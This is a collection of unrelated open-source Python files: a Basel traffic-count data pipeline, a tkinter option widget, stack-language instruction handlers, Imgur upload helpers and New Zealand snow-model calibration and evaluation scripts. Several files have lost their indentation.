# test_rolling_avg()
# test_monthly()
#BVB datensatz https://data.bs.ch/explore/dataset/100075/download/?format=csv&timezone=Europe/Berlin&lang=de&use_labels_for_header=true&csv_separator=%3B
```
#### File: trafficbs/trafficbs/script.py
```python
import csv
import json
from datetime import datetime
import pandas as pd
import requests
from tests import test_weekly_data
from trafficbs import buildlinkmap
from trafficbs import datakicker
from trafficbs import datapreps
from trafficbs import processing
now = datetime.now()
def dailyupdate(legacyfile='data/dailiesnew.csv', dataset_id=100013):
# import existing dataset
legacy = pd.read_csv(legacyfile)
legacy = legacy.loc[legacy['Year'] > 2017]
legacydate = []
for date in legacy.iterrows():
legacydate.append(datetime.strptime(date[1]['Date'], '%d.%m.%Y'))
maxtime = max(legacydate)
    datecode = datetime.strftime(maxtime, '%Y-%m-%dT%H:%M')  # %H:%M (the original '%h%m' is not a valid hour/minute format)
print(datecode)
# 2020-05-07T23%3A00%3A00%2B00.00
data = gatherBS(dataset_id)
dataagg = pd.DataFrame()
for entry in data:
dataagg = dataagg.append(entry['fields'], ignore_index=True)
dataagg.sort_values(by=['year', 'month', 'day'])
dataagg.to_csv('data/poll_' + datetime.strftime(datetime.now(), '%y%m%d.csv'))
dataagg = dataagg.loc[dataagg['datetimefrom'] >= datecode]
datasums = sumdata(dataagg)
aggregate = pd.concat([legacy, datasums], ignore_index=True)
aggregate.drop_duplicates(subset=['SiteCode', 'Date', 'Total', 'TrafficType'])
aggregate.to_csv(legacyfile)
print('csv gespeichert ab ' + str(datecode[:10]) + ' neue Einträge ' + str(len(datasums)))
return dataagg
def sumdata(data):
groups = pd.DataFrame()
groups = data.groupby(['sitecode', 'date']).agg(
{
'total': sum,
'sitename': 'first',
'valuesapproved': 'last',
'traffictype': 'first',
'year': 'first',
'month': 'first',
'day': 'first',
'weekday': 'first',
'geo_point_2d': 'last'
})
groups = groups.reset_index(drop=False)
groups['Geo Point'] = ' '
groups['Geo Point'] = [','.join(map(str, l)) for l in groups['geo_point_2d']]
# groups['Geo Point'].join(groups['geo_point_2d'])
    groups = groups.drop('geo_point_2d', axis=1)  # drop() is not in-place; reassign so the raw column is actually removed
groups.rename(columns={'total': 'Total', 'sitecode': 'SiteCode', 'sitename': 'SiteName', 'date': 'Date',
'valuesapproved': 'ValuesApproved', 'traffictype': 'TrafficType', 'year': 'Year',
'month': 'Month', 'day': 'Day', 'weekday': 'Weekday'}, inplace=True)
groups = groups[
['SiteCode', 'Date', 'Total', 'SiteName', 'ValuesApproved', 'TrafficType', 'Year', 'Month', 'Day', 'Weekday',
'Geo Point']]
return groups
def gatherBS(id):
response = requests.get(
f'https://data.bs.ch/api/records/1.0/search/?dataset={id}&q=&rows=5000&sort=datetimefrom'
)
resp = json.loads(response.text)
print('Daten geholt')
resp1 = resp['records']
return resp1
def addData(data,filename,recent):
with open(f'data/{filename}', 'r') as fileread:
existingLines = [line for line in csv.reader(fileread)]
with open (f'data/{recent}', 'r') as recentdata:
reader2 = csv.reader(recentdata)
for row in reader2:
if row not in existingLines:
print('NEWentry')
with open(f'data/{filename}', 'a') as dbfile:
appender = csv.writer(dbfile)
appender.writerow(row)
dbfile.close()
fileread.close()
recentdata.close()
def writeCSVinit(data, filename):
file = open(f'data/{filename}', 'w')
csvwriter = csv.writer(file)
count = 0
for i in data:
if count == 0:
header = i['fields'].keys()
csvwriter.writerow(header)
count+=1
csvwriter.writerow(i['fields'].values())
file.close()
print('CSV ' + filename + ' geschrieben')
def addTimestamp(filename):
add = now.strftime("%y%m%d_%H%M%S")
filename = filename + '_' + add
return filename
def writeCSVcont(data, filename):
filename = addTimestamp(filename) + '.csv'
file = open(f'data/{filename}', 'w')
csvwriter = csv.writer(file)
count = 0
for i in data:
if count == 0:
header = data[1].keys()
csvwriter.writerow(header)
count+=1
csvwriter.writerow(i.values())
file.close()
return filename
# data = gatherBS(100013)
# writeCSVinit(data, 'rawdata_now.csv')
# recent = writeCSVcont(data, 'trafficdata.csv')
# addData(data,'evchargers.csv', recent)
# print('Neue Tabelle geschrieben: ' + recent)
# dailyupdate()
# dailyupdate('data/dailies_MIV.csv', dataset_id=100006)
# neue Datensätze laden (komplett)
datapreps.csvpoll(bsid=100006, filename='../data/MIV_newpoll.csv')
datapreps.csvpoll(bsid=100013, filename='../data/bp_newpoll.csv')
datapreps.csvpoll(bsid=100075, filename='../data/pt_newpoll.csv')
mivtotals = datapreps.loaddata(filename='../data/MIV_newpoll.csv', histfilename='../data/200531_MIVhist.csv',
savename='../data/dailies_MIV.csv', histdata=True)
bptotals = datapreps.loaddata(filename='../data/bp_newpoll.csv', histfilename='../data/200510_download_hist.csv',
savename='../data/dailiesnew.csv', histdata=True)
# Berechnungen einzelne Stationen
processing.test_rolling_avg()
# Wochenvergleiche generieren
test_weekly_data.test_weekly_comparisons()
# Linkmap Velo bauen
buildlinkmap.addMarkers(datakicker.getChartData('ZOd9a'), '../chartadmin/rollingavg_3m_chartadmin.csv', dwid='ZOd9a')
# Linkmap MIV bauen
buildlinkmap.addMarkers(datakicker.getChartData('BBxPZ'), '../chartadmin/MIV_rollingavg_3m_chartadmin.csv',
dwid='BBxPZ')
print('Skript ist bis zum Ende durchgelaufen')
``` |
{
"source": "JonoCode9374/BreezyUI",
"score": 3
} |
#### File: BreezyUI/Libraries/Option.py
```python
import tkinter
attributes_area = None
class Option:
row = 0
def __init__(self, name, config_name, attr_var, widget_type, applicable_widgets, *args, **kwargs):
'''
Takes:
- self
- name [str] -- The name of this option
- config_name [str] -- The config attribute this affects
- attr_var [str] -- The variable which the attribute is stored in
- widget_type [str] -- The type of widget this option is
- applicable_widgets [[str]] -- The widgets this option shows for
- **kwargs -- The arguments to construct the widget
Does:
- Initalises this instance of option
Returns:
- None
'''
self.name = name
self.attribute = config_name
self.var = attr_var
#Create the label and widget for this option
self.label = tkinter.Label(attributes_area, text=name)
construction = "tkinter.{0}(attributes_area".format(widget_type)
if args:
args = ", ".join([str(x) for x in args])
construction = "{0}, {1}".format(construction, args)
#At this point, construction would equal something like this:
#tkinter.widget_type(attributes_area, args
if kwargs:
kwargs = ', '.join([str(x) + '=' + kwargs[x] for x in kwargs])
construction = "{0}, {1}".format(construction, kwargs)
#If the args wasn't empty, construction would look like this: tkinter.widget_type(attributes_area, args, kwargs
construction += ")"
self.option = eval(construction)
self.x = Option.row
Option.row += 1
self.widgets = applicable_widgets
def show(self, widget_type):
'''
Takes:
- self
- widget_type [str] -- The type of widget being shown
Does:
- Shows the widget in the appropriate location if it is for a widget it supports
Returns:
- None
'''
if widget_type in self.widgets:
if self.name == "Display Text":
self.option.delete(0, tkinter.END)
self.option.insert(0, target_widget.cget("text"))
elif self.name == "Background Colour":
self.option["text"] = target_widget.cget("bg")
elif self.name == "Border Colour":
self.option["text"] = target_widget.cget("highlightbackground")
self.label.grid(row=self.x, column=0)
self.option.grid(row=self.x, column=1)
def hide(self):
'''
Takes:
- self
Does:
- Hides the widget using `.grid_forget()`
Returns:
- None
'''
self.label.grid_forget()
self.option.grid_forget()
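# --- Hedged usage sketch (names below are illustrative, not from the original repo) ---
# The module-level attributes_area must point at a Tk container before options are built,
# and show() additionally expects a module-level target_widget set by the caller:
#
#     import tkinter, Option
#     root = tkinter.Tk()
#     Option.attributes_area = tkinter.Frame(root)
#     Option.attributes_area.pack()
#     text_option = Option.Option("Display Text", "text", "text_var", "Entry",
#                                 ["Button", "Label"])
#     text_option.show("Button")   # grids the label/widget pair for a Button target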
``` |
{
"source": "JonoCode9374/International-Phonetic-Esoteric-Language",
"score": 4
} |
#### File: International-Phonetic-Esoteric-Language/src/instructions.py
```python
def LITERAL(instruction, stack):
if (str.isdigit(instruction)):
stack.push(int(instruction))
else:
stack.push(instruction)
def STACK(instruction, stack):
if instruction in 'c':
stack.pop()
elif instruction in 'ɟ':
stack.push(stack.peek())
elif instruction in 'ɲ':
a = stack[0]
b = stack[-1]
stack[0] = b
stack[-1] = a
elif instruction in 'ç':
stack.push(len(stack))
elif instruction in 'ʝ':
stack.push(stack[stack.pop()])
elif instruction in 'j':
a = stack.pop()
for i in range(a, 0, -1):
stack.push(stack.stack.pop(0))
elif instruction in 'ʎ':
ints, strs = [], []
while not stack.isEmpty():
ele = stack.pop()
if isinstance(ele, int):
ints.append(ele)
else:
strs.append(ele)
ints.sort()
strs.sort()
        ints.extend(strs)  # append the sorted strings after the sorted ints
for i in ints:
stack.push(i)
stack.stack.reverse()
def STRING(instruction, stack):
if instruction in 'q':
a = stack.pop()
b = stack.pop()
stack.push(a + b)
elif instruction in 'ɢ':
stack.push(len(str(stack.peek())))
elif instruction in 'ʀ':
for c in stack.pop():
stack.push(ord(c))
elif instruction in 'ʁ':
        a = str(stack.pop())[::-1]  # reverse the string (list.reverse() returns None)
for c in a:
stack.push(c)
elif instruction in 'ɴ':
a = stack.pop()
b = stack.pop()
stack.push(a[b])
elif instruction in 'χ':
stack.push(chr(stack.pop()))
def MATH(instruction, stack):
import math as m
if instruction in 't':
stack.push(stack.pop() + stack.pop())
elif instruction in 'd':
stack.push(stack.pop() - stack.pop())
elif instruction in 'θ':
stack.push(stack.pop() * stack.pop())
elif instruction in 'ð':
a = stack.pop()
b = stack.pop()
if (b == 0):
stack.push(0)
else:
stack.push(a / b)
elif instruction in 'n':
stack.push(stack.pop() % stack.pop())
elif instruction in 'ʃ':
stack.push(stack.pop() ** stack.pop())
elif instruction in 'ʒ':
stack.push(m.log(stack.pop(), stack.pop()))
elif instruction in 's':
stack.push(stack.pop() + stack.pop())
elif instruction in 'z':
stack.push(stack.pop() >> stack.pop())
elif instruction in 'r':
stack.push(stack.pop() << stack.pop())
elif instruction in 'ɾ':
stack.push(stack.pop() & stack.pop())
elif instruction in 'ɹ':
stack.push(stack.pop() | stack.pop())
elif instruction in 'l':
stack.push(~stack.pop())
elif instruction in 'ɬ':
stack.push(-stack.pop())
elif instruction in 'ɮ':
stack.push(round(stack.pop()))
def LOGICAL(instruction, stack):
if instruction in 'ʈ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(0)
return
if (b == ''):
stack.push(1)
return
if (a > b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɖ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(1)
return
if (b == ''):
stack.push(0)
return
if (a < b):
stack.push(0)
else:
stack.push(1)
elif instruction in 'ʂ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(0)
return
if (b == ''):
stack.push(1)
return
if (a >= b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ʐ':
a = stack.pop()
b = stack.pop()
if (a == ''):
stack.push(1)
return
if (b == ''):
stack.push(0)
return
if (a <= b):
stack.push(0)
else:
stack.push(1)
elif instruction in 'ɳ':
a = stack.pop()
b = stack.pop()
if (a == b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɽ':
a = stack.pop()
b = stack.pop()
if (a == '' or a <= 0):
a = False
else:
a = True
if (b == '' or b <= 0):
b = False
else:
b = True
if (a and b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɻ':
a = stack.pop()
b = stack.pop()
if (a == '' or a <= 0):
a = False
else:
a = True
if (b == '' or b <= 0):
b = False
else:
b = True
if (a or b):
stack.push(1)
else:
stack.push(0)
elif instruction in 'ɭ':
a = stack.pop()
if (a == '' or a <= 0):
stack.push(0)
else:
stack.push(1)
def IO(instruction, stack):
if instruction in 'ɪ':
temp = input()
if temp.isnumeric():
stack.push(int(temp))
elif temp[0] == '-' and temp[1:].isnumeric():
stack.push(int(temp))
else:
for c in temp:
stack.push(ord(c))
elif instruction in 'i':
stack.push(input())
elif instruction in 'o':
print(str(stack.pop()))
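# --- Hedged usage sketch (the Stack class lives elsewhere in the interpreter; a minimal
# object with push/pop/peek/isEmpty and a .stack list is assumed here) ---
#
#     stack = Stack()
#     LITERAL('3', stack)
#     LITERAL('4', stack)
#     MATH('t', stack)   # 't' pops two values and pushes their sum (7)
#     IO('o', stack)     # 'o' pops and prints the top of the stack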
``` |
{
"source": "jonoco/fumblr",
"score": 3
} |
#### File: fumblr/services/imgur.py
```python
from fumblr.keys import IMGUR_SECRET, IMGUR_ID
from imgurpython import ImgurClient, helpers
import os
import base64
API_URL = 'https://api.imgur.com/3/'
def get_client():
"""
Get an API client for Imgur
Returns:
Imgur client if it is available
"""
try:
return ImgurClient(IMGUR_ID, IMGUR_SECRET)
except helpers.error.ImgurClientError:
print(f'Error: imgur client error - id: {IMGUR_ID} secret: {IMGUR_SECRET}')
def delete_image(deletehash):
"""
Delete image from Imgur with given deletehash
Args:
deletehash: Hash id of image to delete
Returns:
Response from Imgur of image deletion if successful, otherwise False
"""
client = get_client()
if client:
try:
return client.delete_image(deletehash)
except:
return False
def upload_image(path):
"""
Upload image at system path to Imgur
Example of response data from Imgur upload:
{'size': 3527,
'title': None,
'animated': False,
'deletehash': 'YkK79ucEtDDn1b9',
'views': 0,
'width': 187,
'account_url': None,
'in_gallery': False,
'name': '',
'section': None,
'account_id': 0,
'type': 'image/png',
'datetime': 1473926225,
'description': None,
'height': 242,
'bandwidth': 0,
'id': 'AEvnA7h',
'favorite': False,
'nsfw': None,
'link': 'http://i.imgur.com/AEvnA7h.png',
'is_ad': False,
'vote': None}
Args:
path: System path of image
Returns:
Response from Imgur
"""
client = get_client()
if client:
image_path = os.path.abspath(path)
upload = client.upload_from_path(image_path)
return upload
def upload(image):
"""
Upload image to Imgur from file
Args:
image: File object
Returns:
Imgur response object
"""
client = get_client()
if client:
contents = image.read()
b64 = base64.b64encode(contents)
data = {
'image': b64,
'type': 'base64'
}
return client.make_request('POST', 'upload', data, True)
def upload_from_url(url):
"""
Upload image to Imgur from url
Args:
url: URL of image
Returns:
Imgur Response object if successful, otherwise False
"""
client = get_client()
if client:
try:
return client.upload_from_url(url)
except helpers.error.ImgurClientError:
print('Error: imgur client error')
return False
def get_image(id):
"""
Return image data for image with given id
Args:
id: Imgur image id
Returns:
Response from Imgur
"""
client = get_client()
if client:
image_data = client.get_image(id)
return image_data
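# --- Hedged usage sketch (assumes valid IMGUR_ID / IMGUR_SECRET in fumblr.keys; the
# 'link' and 'deletehash' fields come from the Imgur response shown above) ---
#
#     resp = upload_from_url('https://example.com/picture.png')
#     if resp:
#         print(resp['link'])
#         delete_image(resp['deletehash'])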
``` |
{
"source": "jonoconway/nz_snow_tools",
"score": 2
} |
#### File: nz_snow_tools/eval/brewster_calibration_TF.py
```python
from __future__ import division
import numpy as np
import matplotlib.pylab as plt
import datetime as dt
from nz_snow_tools.util.utils import resample_to_fsca, nash_sut, mean_bias, rmsd, mean_absolute_error, coef_determ
seb_dat = np.genfromtxt(
'S:\Scratch\Jono\Final Brewster Datasets\SEB_output\cdf - code2p0_MC_meas_noQPS_single_fixed output_fixed_B\modelOUT_br1_headings.txt', skip_header=3)
sw_net = seb_dat[:, 14 - 1]
lw_net = seb_dat[:, 17 - 1]
qs = seb_dat[:, 19 - 1]
ql = seb_dat[:, 20 - 1]
qc = seb_dat[:, 21 - 1]
qprc = seb_dat[:, 22 - 1]
qst = seb_dat[:, 24 - 1]
qm = seb_dat[:, 25 - 1]
t_dep_flux = lw_net + qs + ql + qc + qst
qm_wo_sw_prc = qm - sw_net - qprc
qm_wo_sw_prc[(qm == 0)] = 0
ta = seb_dat[:, 8 - 1]
ea = seb_dat[:, 10 - 1]
ws = seb_dat[:, 7 - 1]
r2_ea = coef_determ(qm_wo_sw_prc, ea)
r2_ta = coef_determ(qm_wo_sw_prc, ta)
r2_ea_ws = coef_determ(qm_wo_sw_prc, ea*ws)
r2_ea_pos = coef_determ(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ea[(qm_wo_sw_prc > 0)])
r2_ta_pos = coef_determ(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ta[(qm_wo_sw_prc > 0)])
r2_ea_ws_pos = coef_determ(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ea[(qm_wo_sw_prc > 0)]*ws[(qm_wo_sw_prc > 0)])
print(r2_ea)
print(r2_ta)
print (r2_ea_ws)
print(r2_ea_pos)
print(r2_ta_pos)
print (r2_ea_ws_pos)
print(
np.sum(ta>0),
np.sum(np.logical_and(ta>0,qm_wo_sw_prc > 0)),
np.sum(qm_wo_sw_prc > 0),
np.sum(np.logical_and(ta>0,qm_wo_sw_prc > 0))/np.sum(ta>0),
)
print(
np.sum(ea>6.112),
np.sum(np.logical_and(ea>6.1120,qm_wo_sw_prc > 0)),
np.sum(qm_wo_sw_prc > 0),
np.sum(np.logical_and(ea>6.1120,qm_wo_sw_prc > 0))/np.sum(ea>6.112),
)
plt.figure()
plt.hexbin(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ta[(qm_wo_sw_prc > 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), np.arange(200) / 14.7,'k')
plt.plot(range(100), np.arange(100) / 8.7,'r')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Air temperature (C)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ta posQM.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[(qm_wo_sw_prc > 0)], ea[(qm_wo_sw_prc > 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), 6.112 + np.arange(200) / 42.0,'k')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Vapour pressure (hPa)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ea posQM.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[~(qm_wo_sw_prc == 0)], ta[~(qm_wo_sw_prc == 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), np.arange(200) / 14.7,'k')
plt.plot(range(100), np.arange(100) / 8.7,'r')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Air temperature (C)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ta.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[~(qm_wo_sw_prc == 0)], ea[~(qm_wo_sw_prc == 0)], cmap=plt.cm.inferno_r)
plt.plot(range(200), 6.112 + np.arange(200) / 42.0,'k')
plt.xlabel('QM - SWnet - Qprecip')
plt.ylabel('Vapour pressure (hPa)')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ea.png')
#plt.show()
print(
np.sum(qm_wo_sw_prc[qm>0])/sw_net.shape,# average positive melt energy from temp dep fluxes
np.sum(sw_net[qm>0])/sw_net.shape, # average melt energy from sw_net
np.sum(qprc[qm>0])/sw_net.shape # average melt energy from precipitation
)
qm_wo_sw_prc[qm_wo_sw_prc<0] = 0 # set all negative melt energy to zero
# find optimal parameters for ea and ta
from scipy.optimize import curve_fit
def f(x, A): # this is your 'straight line' y=f(x)
return A*x
# sum melt energy from ea and ta
# melt factor was 0.025 mm w.e. per hour per hPa
ea_pos = ea-6.112
ea_pos[ea_pos<0] = 0
A = curve_fit(f,ea_pos, qm_wo_sw_prc)[0] # find optimal ea_q factor = 41.9
np.median(qm_wo_sw_prc[qm_wo_sw_prc>0]/ea_pos[qm_wo_sw_prc>0]) # median Wm^-2 per K = 41.7
ea_q = ea_pos * 42
# Wm^-2 per K (melt rate of 0.05 mm w.e. per hour per K = 4.6 Wm^-2 per K)
ta_pos = ta - 0.
ta_pos[ta_pos<0] = 0
A = curve_fit(f,ta_pos, qm_wo_sw_prc)[0]# find optimal ta_q factor = 8.7
np.median(qm_wo_sw_prc[qm_wo_sw_prc>0]/ta_pos[qm_wo_sw_prc>0]) # median Wm^-2 per K = 14.7
ta_q = ta_pos * 8.7
#K * / (mm w.e. W) *
print(
np.sum(qm_wo_sw_prc[qm>0])/sw_net.shape,# average positive melt energy from temp dep fluxes
np.sum(ea_q)/sw_net.shape, # average calculated melt energy from temp dep fluxes using ea
np.sum(ta_q)/sw_net.shape, # average calculated melt energy from temp dep fluxes using ta
np.sum(sw_net[qm>0])/sw_net.shape, # average melt energy from sw_net
np.sum(sw_net[np.logical_and(qm>0,ta<0)])/sw_net.shape, # average melt energy from sw_net when temperature below 0
np.sum(sw_net[np.logical_and(qm>0,ta>0)])/sw_net.shape, # average melt energy from sw_net when temperature above 0
np.sum(qprc[qm>0])/sw_net.shape # average melt energy from precipitation
)
plt.figure()
plt.hexbin(qm_wo_sw_prc[np.logical_and(ta_q>0,qm_wo_sw_prc>0)],ta_q[np.logical_and(ta_q>0,qm_wo_sw_prc>0)])
plt.plot(range(300),range(300),'b--')
plt.ylabel('mod'),plt.xlabel('obs'),plt.title('ta_q vs qm_wo_sw_prc')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ta_q.png')
plt.figure()
plt.hexbin(qm_wo_sw_prc[np.logical_and(ea_q>0,qm_wo_sw_prc>0)],ea_q[np.logical_and(ea_q>0,qm_wo_sw_prc>0)])
plt.ylabel('mod'),plt.xlabel('obs'),plt.title('ea_q vs qm_wo_sw_prc')
plt.plot(range(300),range(300),'b--')
plt.savefig(r'D:\Snow project\Oct2018 Results\qm_wo_sw_prc vs ea_q.png')
plt.figure()
plt.hist(qm_wo_sw_prc[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/ta_pos[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)],20)
plt.xlabel('ta_q_factor (W m-2 K-1)')
plt.savefig(r'D:\Snow project\Oct2018 Results\ta_q_factor_hist.png')
#plt.show()
print(
rmsd(qm_wo_sw_prc,ta_q),
rmsd(qm_wo_sw_prc,ea_q)
)
es = 6.1121 * np.exp(17.502*ta/(240.97+ta))
rh = (ea/es) * 100
plt.scatter(rh[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]*ws[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/10.,qm_wo_sw_prc[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/ta_pos[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)],3)
plt.scatter(rh[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)],qm_wo_sw_prc[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)]/ta_pos[np.logical_and(ta_pos>0.5,qm_wo_sw_prc>0)])
plt.scatter(ql,qm_wo_sw_prc-ta_q)
plt.scatter(ta,qm_wo_sw_prc-ta_q)
```
#### File: nz_snow_tools/eval/catchment_evaluation.py
```python
from __future__ import division
import netCDF4 as nc
import datetime as dt
import numpy as np
import pickle
from nz_snow_tools.snow.clark2009_snow_model import snow_main_simple
from nz_snow_tools.util.utils import convert_date_hydro_DOY, create_mask_from_shpfile, trim_lat_lon_bounds, setup_nztm_dem, make_regular_timeseries, \
trim_data_to_mask
def run_clark2009(catchment, output_dem, hydro_year_to_take, met_inp_folder, catchment_shp_folder):
"""
wrapper to call the clark 2009 snow model for given area
:param catchment: string giving catchment area to run model on
:param output_dem: string identifying the grid to run model on
:param hydro_year_to_take: integer specifying the hydrological year to run model over. 2001 = 1/4/2000 to 31/3/2001
    :return: st_swe, st_melt, st_acc, out_dt, mask. daily grids of SWE at day's end, total melt and accumulation over the previous day, and datetimes of output
"""
print('loading met data')
data_id = '{}_{}'.format(catchment, output_dem)
inp_met = nc.Dataset(met_inp_folder + '/met_inp_{}_hy{}.nc'.format(data_id, hydro_year_to_take), 'r')
inp_dt = nc.num2date(inp_met.variables['time'][:], inp_met.variables['time'].units)
inp_doy = convert_date_hydro_DOY(inp_dt)
inp_hourdec = [datt.hour for datt in inp_dt]
inp_ta = inp_met.variables['temperature'][:]
inp_precip = inp_met.variables['precipitation'][:]
print('met data loaded')
mask = create_mask_from_shpfile(inp_met.variables['lat'][:], inp_met.variables['lon'][:], catchment_shp_folder + '/{}.shp'.format(catchment))
# TODO: think about masking input data to speed up
print('starting snow model')
# start with no snow.
# call main function once hourly/sub-hourly temp and precip data available.
st_swe, st_melt, st_acc = snow_main_simple(inp_ta, inp_precip, inp_doy, inp_hourdec, dtstep=3600)
out_dt = np.asarray(make_regular_timeseries(inp_dt[0], inp_dt[-1] + dt.timedelta(days=1), 86400))
print('snow model finished')
# mask out values outside of catchment
st_swe[:, mask == False] = np.nan
st_melt[:, mask == False] = np.nan
st_acc[:, mask == False] = np.nan
return st_swe, st_melt, st_acc, out_dt, mask
def load_dsc_snow_output(catchment, output_dem, hydro_year_to_take, dsc_snow_output_folder, dsc_snow_dem_folder):
"""
load output from dsc_snow model previously run from linux VM
:param catchment: string giving catchment area to run model on
:param output_dem: string identifying the grid to run model on
:param hydro_year_to_take: integer specifying the hydrological year to run model over. 2001 = 1/4/2000 to 31/3/2001
    :return: st_swe, st_melt, st_acc, out_dt. daily grids of SWE at day's end, total melt and accumulation over the previous day, and datetimes of output
"""
data_id = '{}_{}'.format(catchment, output_dem)
dsc_snow_output = nc.Dataset(dsc_snow_output_folder + '/{}_hy{}.nc'.format(data_id, hydro_year_to_take), 'r')
out_dt = nc.num2date(dsc_snow_output.variables['time'][:], dsc_snow_output.variables['time'].units)
st_swe = dsc_snow_output.variables['snow_water_equivalent'][:]
st_melt_total = dsc_snow_output.variables['ablation_total'][:]
st_acc_total = dsc_snow_output.variables['accumulation_total'][:]
# convert to daily sums
st_melt = np.concatenate((st_melt_total[:1, :], np.diff(st_melt_total, axis=0)))
    st_acc = np.concatenate((st_acc_total[:1, :], np.diff(st_acc_total, axis=0)))
topo_file = nc.Dataset(dsc_snow_dem_folder + '/{}_topo_no_ice.nc'.format(data_id), 'r')
mask = topo_file.variables['catchment'][:].astype('int')
mask = mask != 0 # convert to boolean
# mask out values outside of catchment
st_swe[:, mask == False] = np.nan
st_melt[:, mask == False] = np.nan
st_acc[:, mask == False] = np.nan
return st_swe * 1e3, st_melt * 1e3, st_acc * 1e3, out_dt, mask # convert to mm w.e.
def load_subset_modis(catchment, output_dem, hydro_year_to_take, modis_folder, dem_folder, modis_dem, mask_folder, catchment_shp_folder):
"""
load modis data from file and cut to catchment of interest
:param catchment: string giving catchment area to run model on
:param output_dem: string identifying the grid to run model on
:param hydro_year_to_take: integer specifying the hydrological year to run model over. 2001 = 1/4/2000 to 31/3/2001
:return: trimmed_fsca, modis_dt, trimmed_mask. The data, datetimes and catchment mask
"""
# load a file
nc_file = nc.Dataset(modis_folder + '/fsca_{}hy_comp9.nc'.format(hydro_year_to_take))
fsca = nc_file.variables['fsca'][:].astype('float32')
# read date and convert into hydrological year
modis_dt = nc.num2date(nc_file.variables['time'][:], nc_file.variables['time'].units)
# filter out dud values
fsca[fsca > 100] = np.nan
# trim to only the catchment desired
mask, trimmed_mask = load_mask_modis(catchment, output_dem, mask_folder, dem_folder=dem_folder, modis_dem=modis_dem)
# trimmed_fsca = trim_data_bounds(mask, lat_array, lon_array, fsca[183].copy(), y_centres, x_centres)
trimmed_fsca = trim_data_to_mask(fsca, mask)
# mask out values outside of catchment
trimmed_fsca[:, trimmed_mask == 0] = np.nan
return trimmed_fsca, modis_dt, trimmed_mask
def load_mask_modis(catchment, output_dem, mask_folder, dem_folder, modis_dem):
'''
load mask and trimmed mask of catchment for modis clutha domain
'''
if modis_dem == 'clutha_dem_250m':
# dem_file = dem_folder + modis_dem + '.tif'
_, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(None)
if modis_dem == 'si_dem_250m':
# dem_file = dem_folder + modis_dem + '.tif'
_, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(None, extent_w=1.08e6, extent_e=1.72e6, extent_n=5.52e6, extent_s=4.82e6,
resolution=250)
if modis_dem == 'modis_si_dem_250m':
# dem_file = dem_folder + modis_dem + '.tif'
_, x_centres, y_centres, lat_array, lon_array = setup_nztm_dem(None, extent_w=1.085e6, extent_e=1.72e6, extent_n=5.52e6, extent_s=4.82e6,
resolution=250)
# # Get the masks for the individual regions of interest
mask = np.load(mask_folder + '/{}_{}.npy'.format(catchment, modis_dem))
_, _, trimmed_mask, _, _ = trim_lat_lon_bounds(mask, lat_array, lon_array, mask.copy(), y_centres, x_centres)
return mask, trimmed_mask
def load_dsc_snow_output_python_otf(catchment, output_dem, year_to_take, dsc_snow_output_folder):
dsc_snow_output = nc.Dataset(dsc_snow_output_folder + '/snow_out_{}_{}_{}.nc'.format(catchment, output_dem, year_to_take - 1), 'r')
out_dt = nc.num2date(dsc_snow_output.variables['time'][:], dsc_snow_output.variables['time'].units)
st_swe = dsc_snow_output.variables['swe'][:]
st_melt = dsc_snow_output.variables['melt'][:]
st_acc = dsc_snow_output.variables['acc'][:]
return st_swe, st_melt, st_acc, out_dt
if __name__ == '__main__':
which_model = 'dsc_snow' # string identifying the model to be run. options include 'clark2009', 'dsc_snow', or 'all' # future will include 'fsm'
clark2009run = True # boolean specifying if the run already exists
dsc_snow_opt = 'python' # string identifying which version of the dsc snow model to use output from 'python' or 'fortran'
    dsc_snow_opt2 = 'netCDF' # string identifying which version of output from python model 'netCDF' or 'pickle'
catchment = 'Clutha'
output_dem = 'nztm250m' # identifier for output dem
hydro_years_to_take = range(2001, 2016 + 1) # [2013 + 1] # range(2001, 2013 + 1)
modis_sc_threshold = 50 # value of fsca (in percent) that is counted as being snow covered
model_swe_sc_threshold = 5 # threshold for treating a grid cell as snow covered
dsc_snow_output_folder = 'T:/DSC-Snow/nz_snow_runs/baseline_clutha2'
clark2009_output_folder = 'T:/DSC-Snow/nz_snow_runs/baseline_clutha1'
mask_folder = 'T:/DSC-Snow/Masks'
catchment_shp_folder = 'Z:/GIS_DATA/Hydrology/Catchments'
modis_folder = 'Z:/MODIS_snow/MODIS_NetCDF'
dem_folder = 'Z:/GIS_DATA/Topography/DEM_NZSOS/'
modis_dem = 'clutha_dem_250m'
met_inp_folder = 'T:/DSC-Snow/input_data_hourly'
dsc_snow_dem_folder = 'P:/Projects/DSC-Snow/runs/input_DEM'
